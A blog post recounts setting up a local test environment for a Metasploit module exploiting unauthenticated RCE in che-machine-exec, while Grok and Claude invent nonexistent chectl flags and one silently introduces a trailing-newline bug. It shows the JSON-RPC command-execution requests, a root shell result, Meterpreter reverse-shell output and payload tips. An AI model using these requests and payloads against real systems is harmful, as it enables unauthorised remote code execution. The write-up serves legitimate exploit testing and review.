I Asked Two AIs to Help Me Set Up a Test Environment. Here's What Actually Happened.

Tested with Grok 4 (4.20 Beta) and Claude Sonnet 4.6, February 2026

TL;DR: Two AIs, one trailing newline, several phantom CLI flags. Building a reproducible test environment for my Metasploit PR took considerably longer than either model promised.


I recently pushed a Metasploit module for CVE-2025-12548 - an unauthenticated RCE in che-machine-exec, a component of Red Hat OpenShift Dev Spaces, that we stumbled across during a pentest. The module was written, submitted, and reviewed in the final days of the engagement. Two months after opening the PR, the module remains unmerged; the reviewer couldn't reproduce the vulnerable environment. The Docker Hub image accepts connections but crashes when attempting to execute commands as it needs a running Kubernetes cluster behind it, and there doesn't appear to be a documented way to stand one up for testing.

The fix was obvious: write a reproducible Kubernetes setup guide that anyone could follow end to end. Easy in theory these days - I'd just ask an LLM, or better, two (because two confidently wrong answers are more interesting than one).

What followed was a few hours of rabbit holes, phantom flags and command options that didn't exist.

it-will-only-4099eb0979.jpg


Starting with Grok

I opened Grok 4 (4.20 Beta) first. Asked it to research how to get a vulnerable che-machine-exec instance running locally:

so what would be the steps to get devspaces instance running locally on minikube / another small / simple local distro in docker ideally? research for blogs and articles first

It went off, cited sources, came back confident. The answer: deploy Eclipse Che 7.102.0 on Minikube using chectl, pin the version with --version=7.102.0 passed to chectl server:deploy. Done in under 30 minutes. Simple enough.

Grok's full response (trimmed for relevance)
The simplest & smallest local option is Eclipse Che (upstream) on Minikube with Docker
driver — this is lightweight, free (no Red Hat account), uses Docker under the hood, and
the che-machine-exec vuln behaves exactly the same as in Dev Spaces. Perfect for testing
your Metasploit module.

Target: Eclipse Che 7.102.x (matches Dev Spaces 3.21, vulnerable)

Step-by-step commands:

Deploy vulnerable Eclipse Che 7.102 (or any 7.x before ~7.104):

chectl server:deploy \
  --platform minikube \
  --version=7.102.0 \
  --installer=operator

(If the exact tag fails, try
--cheimage=eclipse/che-server:7.102.0 or check available tags on quay.io/eclipse/che-server)

This should get you a working vulnerable instance in <30 min. Great work on the module!

chectl server:deploy \
  --platform minikube \
  --version=7.102.0 \
  --installer=operator

Running it produced:

Error: Nonexistent flag: --version=7.102.0
See more help with --help
    at validateArgs (/usr/local/lib/chectl/node_modules/@oclif/core/lib/parser/validate.js:10:19)
    at validate (/usr/local/lib/chectl/node_modules/@oclif/core/lib/parser/validate.js:173:5)

The flag doesn't exist on the deploy subcommand (for reference, chectl --version on my machine returned chectl/7.114.0 linux-x64 node-v18.20.4).

Grok had confused the tool's own version flag with a deploy-time image pinning option that simply doesn't exist. When I brought in Claude Sonnet 4.6 to peer review, it reached the same conclusion: the flag doesn't exist in current chectl source; the fallback --cheimage flag Grok suggested as an alternative was equally made up. (I was pasting Claude's reviews directly into the Grok chat and vice versa, using each model to challenge the other's output in real time. It's a surprisingly effective workflow; they're much better at spotting each other's mistakes than their own.)

Grok accepted the critique, updated the steps. Still wrong, just differently wrong. The revised suggestion was to use --cheimage=eclipse/che-server:7.102.0 as a fallback flag. That flag doesn't exist either. At that point Grok pivoted to a different approach entirely: forget version pinning the whole stack, deploy current Che and patch only the che-machine-exec deployment to use the known vulnerable image directly. This worked until it turned out the deployment name didn't exist in the newer Che version, at which point Grok suggested --version=7.102.0 again; the same flag it had already accepted was invalid two iterations earlier:

> chectl server:deploy --platform minikube --version=7.102.0

Error: Nonexistent flag: --version=7.102.0
See more help with --help
    at validateArgs (/usr/local/lib/chectl/node_modules/@oclif/core/lib/parser/validate.js:10:19)
    at validate (/usr/local/lib/chectl/node_modules/@oclif/core/lib/parser/validate.js:173:5)
    at Object.parse (/usr/local/lib/chectl/node_modules/@oclif/core/lib/parser/index.js:19:35)
    at async Deploy.parse (/usr/local/lib/chectl/node_modules/@oclif/core/lib/command.js:246:25)

Its sign-off on that message:

Run the delete + deploy now and paste any output/error here (especially if the deploy step complains about version). I'll fix it instantly.

You're literally 10 minutes away from a working vulnerable instance. Go for it! 🚀

Claude called the source-build idea first. Grok accepted the critique immediately and produced the first working native-build commands in the very next message.


The Image That Wouldn't Run

The plan: deploy current Che, then patch the che-machine-exec deployment to swap in the known vulnerable image:

kubectl -n eclipse-che patch deployment che-machine-exec \
  --type='json' -p='[{"op": "replace", "path": "/spec/template/spec/containers/0/image", \
  "value":"quay.io/eclipse/che-machine-exec:7.102.0"}]'

The pod immediately went into CrashLoopBackOff. Checking the logs:

exec /go/bin/che-machine-exec: no such file or directory

The binary was supposedly right there, yet the kernel disagreed. This is likely a FROM scratch pitfall; no shared libraries, no shell, nothing except the binary itself. If the binary has any dynamic linking or architecture mismatch, you get exactly this error (but we moved on before confirming it, so take that with a pinch of salt).

Grok suggested explicitly specifying the entrypoint:

command: ["/go/bin/che-machine-exec"]
args: ["--port=3333", "--log-level=debug"]

Same error. Then env vars. Same error.

At this point I handed the thread fully to Claude Sonnet 4.6 and asked it to peer review everything done so far. The verdict: stop fighting the image, build from source instead.

akld5r.jpg


Fine, We'll Build It Ourselves

The idea was sound: 1) clone the repo 2) compile the Go binary 3) run it directly on the host. No Docker image quirks, no Kubernetes pod lifecycle, no scratch image nonsense. Just a Go binary doing its thing.

This sidestepped the image problem entirely, but introduced a new one. The build worked first time, then we ran it:

PANI[0000] Error: Unable to create manager. Unable to get service account info.
panic: (*logrus.Entry) 0xc000509420
goroutine 1 [running]:
github.com/eclipse-che/che-machine-exec/exec.CreateExecManager()
        /home/osboxes/llm/cube/che-machine-exec/exec/exec-manager-provider.go:64 +0xf2

Right. che-machine-exec expects to run inside a Kubernetes pod, with a service account token mounted at /var/run/secrets/kubernetes.io/serviceaccount/. On a bare host, none of that exists.

So we faked it; created the directory, wrote a dummy token, a dummy namespace, an empty ca.crt:

sudo mkdir -p /var/run/secrets/kubernetes.io/serviceaccount
echo "dummy-token" | sudo tee /var/run/secrets/kubernetes.io/serviceaccount/token > /dev/null
printf "eclipse-che" | sudo tee /var/run/secrets/kubernetes.io/serviceaccount/namespace > /dev/null
echo "" | sudo tee /var/run/secrets/kubernetes.io/serviceaccount/ca.crt > /dev/null

./che-machine-exec-vuln -url 0.0.0.0:3333 -static /tmp/static

Restarted. New error:

FATA[0000] pod selector is required. Configure custom pod selector or
che workspace/devworkspace id env var to activate defaults

Set that. New error:

FATA[0000] Unable to create activity manager. Cause: CHE_WORKSPACE_NAME or
DEVWORKSPACE_NAME environment variables must be set

Set those. New error:

ERRO[0218] Expected to load root CA config from /var/run/secrets/kubernetes.io/serviceaccount/ca.crt:
data does not contain any valid RSA or ECDSA certificates

Each fix revealed the next requirement. It felt less like debugging and more like filling out a form where every field you complete reveals three more fields underneath. The binary's entire purpose, apparently, was to tell me what it needed next.

"What is my purpose?"
"You require a pod selector."
"Oh my god."
"Yeah. Welcome to Kubernetes."

The actual fix for the certificate was to stop writing an empty file and copy the real minikube CA cert instead:

sudo cp \
  $(kubectl config view --raw -o jsonpath='{.clusters[?(@.name=="minikube")].cluster.certificate-authority}') \
  /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

The token needed to be real too; generated from a service account with actual cluster permissions:

kubectl -n eclipse-che create token machine-exec-test | \
  sudo tee /var/run/secrets/kubernetes.io/serviceaccount/token > /dev/null

First Signs of Life

Eventually che-machine-exec-vuln started. The output was everything you want to see after a morning of panics:

[GIN-debug] Listening and serving HTTP on 0.0.0.0:3333
2026/02/18 12:56:19 Json-rpc MachineExec Routes:
2026/02/18 12:56:19 ✓ create
2026/02/18 12:56:19 ✓ check
2026/02/18 12:56:19 ✓ resize
2026/02/18 12:56:19 ✓ listContainers
INFO[0000] Activity tracker is run and workspace will be stopped in 24h0m0s

A quick healthcheck:

curl http://127.0.0.1:3333/healthz
# 200 OK

Then the real test:

wscat -c ws://localhost:3333/connect
{"jsonrpc":"2.0","method":"connected","params":{"time":"2026-02-18T13:01:12.623713495Z","channel":"tunnel-1","tunnel":"tunnel-1","text":"Hello!"}}

Sending a create command:

{"jsonrpc":"2.0","method":"create","params":{"cmd":["id"],"type":"process"},"id":1}

Returned an exec ID. Attaching to it:

wscat -c ws://localhost:3333/attach/1
uid=0(root) gid=0(root) groups=0(root),1005780000

D0AvnFaX0AEFcUY.jpg


Running the Module

The Metasploit module fired cleanly against it shortly after:

msf exploit(linux/http/eclipse_che_machine_exec_rce) > run
[*] Started reverse TCP handler on 192.168.49.1:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Connecting to machine-exec service...
[*] Response body length: 0, body: ""
[+] Connected to machine-exec service
[*] Received hello: {"jsonrpc":"2.0","method":"connected","params":{"time":"2026-02-19T11:10:32.741522762Z","channel":"tunnel-1","tunnel":"tunnel-1","text":"Hello!"}}
[*] Staging payload via JSON-RPC create method...
[+] Command staged with process ID: 1
[*] Triggering execution via /attach/1...
[+] Payload triggered!
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 192.168.49.2
[*] Command Stager progress - 100.00% done (823/823 bytes)
[*] Meterpreter session 6 opened (192.168.49.1:4444 -> 192.168.49.2:41510) at 2026-02-19 11:10:33 +0000

Clean run. Almost.

Three minor caveats.

First, set LHOST to the minikube gateway IP, not 127.0.0.1. The reverse shell spawns inside a pod and can't route to the host's loopback.

Second, use ubuntu for your target pod, not busybox. Busybox doesn't have bash and cmd/unix/reverse_bash will fail silently with exit code 127.

Third, during testing I caught an intermittent "No hello message received" failure in the module. The server was up, the WebSocket connected, but roughly half the time the module failed before the exploit even fired.

Two consecutive runs, same server and config, but with body length 0 vs body length 151:

msf exploit(linux/http/eclipse_che_machine_exec_rce) > run
[*] Connecting to machine-exec service...
[*] Response body length: 0, body: ""
[+] Connected to machine-exec service
[-] Exploit aborted due to failure: unexpected-reply: No hello message received
[*] Exploit completed, but no session was created.

msf exploit(linux/http/eclipse_che_machine_exec_rce) > run
[*] Connecting to machine-exec service...
[*] Response body length: 151, body: "\x81~\x00\x93{\"jsonrpc\":\"2.0\",\"method\":\"connected\"..."
[+] Connected to machine-exec service
[*] Received hello: {"jsonrpc":"2.0","method":"connected","params":{...,"text":"Hello!"}}
[*] Staging payload via JSON-RPC create method...

Turns out the WebSocket upgrade completes and che-machine-exec immediately sends a hello frame. Sometimes it arrives fast enough to get absorbed into the HTTP 101 response body. Sometimes it arrives after Rex has finished parsing and res.body comes back empty. The fix was a socket fallback; when the body is empty, read the frame directly from the socket using get_wsframe. Fixed in this commit on PR #20835.


One More Hour I'm Not Getting Back

I thought it was done. I was wrong.

The next day I went to re-run the setup from scratch to verify the steps were reproducible before pushing to upstream. I asked Claude to consolidate the working commands into a clean setup guide. One hour later I had been harshly reminded of something.

The original working commands on day one used printf for the namespace file; Claude had corrected Grok's echo to avoid the trailing newline. When consolidating the guide on day two, Claude reverted to echo, matching Grok's original convention and silently undoing its own fix:

echo "eclipse-che" | sudo tee /var/run/secrets/kubernetes.io/serviceaccount/namespace > /dev/null

It had worked perfectly the day before. Now it wouldn't stage a command:

msf exploit(linux/http/eclipse_che_machine_exec_rce) > run
[*] Started reverse TCP handler on 192.168.49.1:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Connecting to machine-exec service...
[*] Response body length: 0, body: ""
[+] Connected to machine-exec service
[*] Received hello: {"jsonrpc":"2.0","method":"connected","params":{"time":"2026-02-19T10:25:51.18847384Z","channel":"tunnel-1","tunnel":"tunnel-1","text":"Hello!"}}
[*] Staging payload via JSON-RPC create method...
[-] Exploit aborted due to failure: unexpected-reply: Failed to stage command: pods could not be found with selector: che.workspace_id=test-workspace-id
[*] Exploit completed, but no session was created.

I sat staring, banging my head against the wall, at kubectl get pods (pod running, label correct), curl to the Kubernetes API (HTTP 200, pod returned), cat /var/run/secrets/kubernetes.io/serviceaccount/namespace (looks fine), for the better part of an hour before checking the file size:

ls -l /var/run/secrets/kubernetes.io/serviceaccount/namespace
# -rw-r--r-- 1 root root 12 Feb 19 10:42 namespace

The file ends up 12 bytes. eclipse-che is 11 characters. The extra byte is \n. The binary reads the file and uses the raw string as the namespace. The API call goes to:

/api/v1/namespaces/eclipse-che%0A/pods

Which returns nothing. No error. Just an empty list. The error message is pods could not be found with selector: che.workspace_id=test-workspace-id - which is technically accurate and completely useless for diagnosing the actual problem. The fix is one character: replace echo with printf (or echo -n), which doesn't append a newline (I didn't packet-capture the API call to formally prove the %0A was the culprit, but the fix was immediate and the file size math checks out).

There was no bug yesterday. The first day commands used printf, which was correct. The bug only came into existence when Claude rewrote the guide on day two and substituted echo. It then became visible immediately because the day-two rebuild used real minikube credentials, meaning the namespace value was actually sent to the Kubernetes API for the first time. Re-running from scratch before publishing was the right call, it just wasn't supposed to be this educational.

Neither LLM caught it during troubleshooting. One of them caused it. I found it by re-running the steps and checking the file size.

05onfire1_xp-superJumbo-v2.webp

What This Actually Tells Us

I ran this entire session manually rather than handing it to Claude Code or Codex to automate. Not because LLMs aren't useful; this post is evidence that they are. Grok identified the right platform, Claude identified the right architecture pivot, and both were genuinely helpful for reasoning about unfamiliar code. But the bug that cost me an hour, a trailing newline in a namespace file, wasn't just missed by an LLM - it was introduced by one. Claude silently rewrote a working printf as echo while consolidating the setup guide, and neither model could diagnose the regression.

I found it by checking ls -l and counting bytes. That was a human debugging instinct, not a prompt. It's the kind of skill that atrophies when you stop exercising it, and for this kind of work, exploratory debugging where the failure modes are the point, staying in the driver's seat was the right trade-off, even if it took longer.

Grok's confidence calibration deserves its own mention. Every response, including the ones that were wrong, ended with variations of "you're literally one command away 🚀" and "10 seconds from success!" After four consecutive failures this stops feeling like encouragement and starts feeling like a miscalibrated prior. If the model can't tell you how confident it actually is, the confidence signal becomes noise.

I'm not convinced the time saved by full autonomy would have been reclaimed for anything useful either. In my experience, the hours you claw back tend to get reinvested into managing the AI workflow itself: prompt optimisation, sub-agent orchestration, tooling for the tooling. Your mileage may vary. But the pattern I keep seeing is that you end up in the same place, just with more moving parts.

LLMs are a tool. The critical thinking is still yours to maintain or lose. As someone put it recently: AI works as an amplifier. If you have zero skills, you cannot amplify them. The ls -l that cracked this wasn't something I could have prompted for, because I didn't know what I was looking for until I found it.

bekphnqftcb41.webp

The PR is still open. The full setup guide is in the module documentation. Somewhere out there a Metasploit reviewer is finally going to get a shell.

Fair enough.